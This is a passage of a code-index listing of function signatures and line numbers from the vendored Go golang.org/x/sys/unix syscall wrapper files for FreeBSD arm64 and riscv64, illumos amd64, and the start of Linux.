req uint, arg unsafe.Pointer) (err error) { function sysctl (line 400) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function ptrace (line 416) | func ptrace(request int, pid int, addr uintptr, data int) (err error) { function ptracePtr (line 426) | func ptracePtr(request int, pid int, addr unsafe.Pointer, data int) (err... function Access (line 436) | func Access(path string, mode uint32) (err error) { function Adjtime (line 451) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function CapEnter (line 461) | func CapEnter() (err error) { function capRightsGet (line 471) | func capRightsGet(version int, fd int, rightsp *CapRights) (err error) { function capRightsLimit (line 481) | func capRightsLimit(fd int, rightsp *CapRights) (err error) { function Chdir (line 491) | func Chdir(path string) (err error) { function Chflags (line 506) | func Chflags(path string, flags int) (err error) { function Chmod (line 521) | func Chmod(path string, mode uint32) (err error) { function Chown (line 536) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 551) | func Chroot(path string) (err error) { function ClockGettime (line 566) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 576) | func Close(fd int) (err error) { function Dup (line 586) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 597) | func Dup2(from int, to int) (err error) { function Exit (line 607) | func Exit(code int) { function ExtattrGetFd (line 614) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 630) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 646) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 661) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 672) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 693) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 714) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 734) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 750) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 771) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 792) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 812) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Fadvise (line 828) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 853) | func Fchdir(fd int) (err error) { function Fchflags (line 863) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 873) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 883) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 898) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 908) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 923) | func Flock(fd int, how int) (err error) { function Fpathconf (line 933) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 944) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 954) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 969) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 979) | func Fsync(fd int) (err error) { function Ftruncate (line 989) | func Ftruncate(fd int, length int64) (err error) { function getdirentries (line 999) | func getdirentries(fd int, buf []byte, basep *uint64) (n int, err error) { function Getdtablesize (line 1016) | func Getdtablesize() (size int) { function Getegid (line 1024) | func Getegid() (egid int) { function Geteuid (line 1032) | func Geteuid() (uid int) { function Getgid (line 1040) | func Getgid() (gid int) { function Getpgid (line 1048) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1059) | func Getpgrp() (pgrp int) { function Getpid (line 1067) | func Getpid() (pid int) { function Getppid (line 1075) | func Getppid() (ppid int) { function Getpriority (line 1083) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1094) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1104) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1114) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1125) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1135) | func Getuid() (uid int) { function Issetugid (line 1143) | func Issetugid() (tainted bool) { function Kill (line 1151) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1161) | func Kqueue() (fd int, err error) { function Lchown (line 1172) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1187) | func Link(path string, link string) (err error) { function Linkat (line 1207) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1227) | func Listen(s int, backlog int) (err error) { function Mkdir (line 1237) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1252) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1267) | func Mkfifo(path string, mode uint32) (err error) { function Mknodat (line 1282) | func Mknodat(fd int, path string, mode uint32, dev uint64) (err error) { function Nanosleep (line 1297) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1307) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1323) | func Openat(fdat int, path string, mode int, perm uint32) (fd int, err e... function Pathconf (line 1339) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1355) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1372) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1389) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1406) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1428) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1450) | func Rename(from string, to string) (err error) { function Renameat (line 1470) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1490) | func Revoke(path string) (err error) { function Rmdir (line 1505) | func Rmdir(path string) (err error) { function Seek (line 1520) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1531) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1542) | func Setegid(egid int) (err error) { function Seteuid (line 1552) | func Seteuid(euid int) (err error) { function Setgid (line 1562) | func Setgid(gid int) (err error) { function Setlogin (line 1572) | func Setlogin(name string) (err error) { function Setpgid (line 1587) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1597) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1607) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1617) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1627) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1637) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setsid (line 1647) | func Setsid() (pid int, err error) { function Settimeofday (line 1658) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1668) | func Setuid(uid int) (err error) { function Statfs (line 1678) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 1693) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1713) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1733) | func Sync() (err error) { function Truncate (line 1743) | func Truncate(path string, length int64) (err error) { function Umask (line 1758) | func Umask(newmask int) (oldmask int) { function Undelete (line 1766) | func Undelete(path string) (err error) { function Unlink (line 1781) | func Unlink(path string) (err error) { function Unlinkat (line 1796) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1811) | func Unmount(path string, flags int) (err error) { function write (line 1826) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1843) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1854) | func munmap(addr uintptr, length uintptr) (err error) { function accept4 (line 1864) | func accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) ... function utimensat (line 1875) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... FILE: vendor/golang.org/x/sys/unix/zsyscall_freebsd_arm64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getcwd (line 363) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 380) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 390) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 400) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function ptrace (line 416) | func ptrace(request int, pid int, addr uintptr, data int) (err error) { function ptracePtr (line 426) | func ptracePtr(request int, pid int, addr unsafe.Pointer, data int) (err... function Access (line 436) | func Access(path string, mode uint32) (err error) { function Adjtime (line 451) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function CapEnter (line 461) | func CapEnter() (err error) { function capRightsGet (line 471) | func capRightsGet(version int, fd int, rightsp *CapRights) (err error) { function capRightsLimit (line 481) | func capRightsLimit(fd int, rightsp *CapRights) (err error) { function Chdir (line 491) | func Chdir(path string) (err error) { function Chflags (line 506) | func Chflags(path string, flags int) (err error) { function Chmod (line 521) | func Chmod(path string, mode uint32) (err error) { function Chown (line 536) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 551) | func Chroot(path string) (err error) { function ClockGettime (line 566) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 576) | func Close(fd int) (err error) { function Dup (line 586) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 597) | func Dup2(from int, to int) (err error) { function Exit (line 607) | func Exit(code int) { function ExtattrGetFd (line 614) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 630) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 646) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 661) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 672) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 693) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 714) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 734) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 750) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 771) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 792) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 812) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Fadvise (line 828) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 853) | func Fchdir(fd int) (err error) { function Fchflags (line 863) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 873) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 883) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 898) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 908) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 923) | func Flock(fd int, how int) (err error) { function Fpathconf (line 933) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 944) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 954) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 969) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 979) | func Fsync(fd int) (err error) { function Ftruncate (line 989) | func Ftruncate(fd int, length int64) (err error) { function getdirentries (line 999) | func getdirentries(fd int, buf []byte, basep *uint64) (n int, err error) { function Getdtablesize (line 1016) | func Getdtablesize() (size int) { function Getegid (line 1024) | func Getegid() (egid int) { function Geteuid (line 1032) | func Geteuid() (uid int) { function Getgid (line 1040) | func Getgid() (gid int) { function Getpgid (line 1048) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1059) | func Getpgrp() (pgrp int) { function Getpid (line 1067) | func Getpid() (pid int) { function Getppid (line 1075) | func Getppid() (ppid int) { function Getpriority (line 1083) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1094) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1104) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1114) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1125) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1135) | func Getuid() (uid int) { function Issetugid (line 1143) | func Issetugid() (tainted bool) { function Kill (line 1151) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1161) | func Kqueue() (fd int, err error) { function Lchown (line 1172) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1187) | func Link(path string, link string) (err error) { function Linkat (line 1207) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1227) | func Listen(s int, backlog int) (err error) { function Mkdir (line 1237) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1252) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1267) | func Mkfifo(path string, mode uint32) (err error) { function Mknodat (line 1282) | func Mknodat(fd int, path string, mode uint32, dev uint64) (err error) { function Nanosleep (line 1297) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1307) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1323) | func Openat(fdat int, path string, mode int, perm uint32) (fd int, err e... function Pathconf (line 1339) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1355) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1372) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1389) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1406) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1428) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1450) | func Rename(from string, to string) (err error) { function Renameat (line 1470) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1490) | func Revoke(path string) (err error) { function Rmdir (line 1505) | func Rmdir(path string) (err error) { function Seek (line 1520) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1531) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1542) | func Setegid(egid int) (err error) { function Seteuid (line 1552) | func Seteuid(euid int) (err error) { function Setgid (line 1562) | func Setgid(gid int) (err error) { function Setlogin (line 1572) | func Setlogin(name string) (err error) { function Setpgid (line 1587) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1597) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1607) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1617) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1627) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1637) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setsid (line 1647) | func Setsid() (pid int, err error) { function Settimeofday (line 1658) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1668) | func Setuid(uid int) (err error) { function Statfs (line 1678) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 1693) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1713) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1733) | func Sync() (err error) { function Truncate (line 1743) | func Truncate(path string, length int64) (err error) { function Umask (line 1758) | func Umask(newmask int) (oldmask int) { function Undelete (line 1766) | func Undelete(path string) (err error) { function Unlink (line 1781) | func Unlink(path string) (err error) { function Unlinkat (line 1796) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1811) | func Unmount(path string, flags int) (err error) { function write (line 1826) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1843) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1854) | func munmap(addr uintptr, length uintptr) (err error) { function accept4 (line 1864) | func accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) ... function utimensat (line 1875) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... FILE: vendor/golang.org/x/sys/unix/zsyscall_freebsd_riscv64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getcwd (line 363) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 380) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 390) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 400) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function ptrace (line 416) | func ptrace(request int, pid int, addr uintptr, data int) (err error) { function ptracePtr (line 426) | func ptracePtr(request int, pid int, addr unsafe.Pointer, data int) (err... function Access (line 436) | func Access(path string, mode uint32) (err error) { function Adjtime (line 451) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function CapEnter (line 461) | func CapEnter() (err error) { function capRightsGet (line 471) | func capRightsGet(version int, fd int, rightsp *CapRights) (err error) { function capRightsLimit (line 481) | func capRightsLimit(fd int, rightsp *CapRights) (err error) { function Chdir (line 491) | func Chdir(path string) (err error) { function Chflags (line 506) | func Chflags(path string, flags int) (err error) { function Chmod (line 521) | func Chmod(path string, mode uint32) (err error) { function Chown (line 536) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 551) | func Chroot(path string) (err error) { function ClockGettime (line 566) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 576) | func Close(fd int) (err error) { function Dup (line 586) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 597) | func Dup2(from int, to int) (err error) { function Exit (line 607) | func Exit(code int) { function ExtattrGetFd (line 614) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 630) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 646) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 661) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 672) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 693) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 714) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 734) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 750) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 771) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 792) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 812) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Fadvise (line 828) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 853) | func Fchdir(fd int) (err error) { function Fchflags (line 863) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 873) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 883) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 898) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 908) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 923) | func Flock(fd int, how int) (err error) { function Fpathconf (line 933) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 944) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 954) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 969) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 979) | func Fsync(fd int) (err error) { function Ftruncate (line 989) | func Ftruncate(fd int, length int64) (err error) { function getdirentries (line 999) | func getdirentries(fd int, buf []byte, basep *uint64) (n int, err error) { function Getdtablesize (line 1016) | func Getdtablesize() (size int) { function Getegid (line 1024) | func Getegid() (egid int) { function Geteuid (line 1032) | func Geteuid() (uid int) { function Getgid (line 1040) | func Getgid() (gid int) { function Getpgid (line 1048) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1059) | func Getpgrp() (pgrp int) { function Getpid (line 1067) | func Getpid() (pid int) { function Getppid (line 1075) | func Getppid() (ppid int) { function Getpriority (line 1083) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1094) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1104) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1114) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1125) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1135) | func Getuid() (uid int) { function Issetugid (line 1143) | func Issetugid() (tainted bool) { function Kill (line 1151) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1161) | func Kqueue() (fd int, err error) { function Lchown (line 1172) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1187) | func Link(path string, link string) (err error) { function Linkat (line 1207) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1227) | func Listen(s int, backlog int) (err error) { function Mkdir (line 1237) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1252) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1267) | func Mkfifo(path string, mode uint32) (err error) { function Mknodat (line 1282) | func Mknodat(fd int, path string, mode uint32, dev uint64) (err error) { function Nanosleep (line 1297) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1307) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1323) | func Openat(fdat int, path string, mode int, perm uint32) (fd int, err e... function Pathconf (line 1339) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1355) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1372) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1389) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1406) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1428) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1450) | func Rename(from string, to string) (err error) { function Renameat (line 1470) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1490) | func Revoke(path string) (err error) { function Rmdir (line 1505) | func Rmdir(path string) (err error) { function Seek (line 1520) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1531) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1542) | func Setegid(egid int) (err error) { function Seteuid (line 1552) | func Seteuid(euid int) (err error) { function Setgid (line 1562) | func Setgid(gid int) (err error) { function Setlogin (line 1572) | func Setlogin(name string) (err error) { function Setpgid (line 1587) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1597) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1607) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1617) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1627) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1637) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setsid (line 1647) | func Setsid() (pid int, err error) { function Settimeofday (line 1658) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1668) | func Setuid(uid int) (err error) { function Statfs (line 1678) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 1693) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1713) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1733) | func Sync() (err error) { function Truncate (line 1743) | func Truncate(path string, length int64) (err error) { function Umask (line 1758) | func Umask(newmask int) (oldmask int) { function Undelete (line 1766) | func Undelete(path string) (err error) { function Unlink (line 1781) | func Unlink(path string) (err error) { function Unlinkat (line 1796) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1811) | func Unmount(path string, flags int) (err error) { function write (line 1826) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1843) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1854) | func munmap(addr uintptr, length uintptr) (err error) { function accept4 (line 1864) | func accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) ... function utimensat (line 1875) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... FILE: vendor/golang.org/x/sys/unix/zsyscall_illumos_amd64.go function readv (line 34) | func readv(fd int, iovs []Iovec) (n int, err error) { function preadv (line 49) | func preadv(fd int, iovs []Iovec, off int64) (n int, err error) { function writev (line 64) | func writev(fd int, iovs []Iovec) (n int, err error) { function pwritev (line 79) | func pwritev(fd int, iovs []Iovec, off int64) (n int, err error) { function accept4 (line 94) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... FILE: vendor/golang.org/x/sys/unix/zsyscall_linux.go function FanotifyInit (line 14) | func FanotifyInit(flags uint, event_f_flags uint) (fd 